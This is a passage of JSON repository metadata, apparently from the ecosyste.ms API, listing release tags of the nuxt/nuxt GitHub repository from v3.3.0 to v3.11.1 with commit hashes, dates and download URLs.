@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnu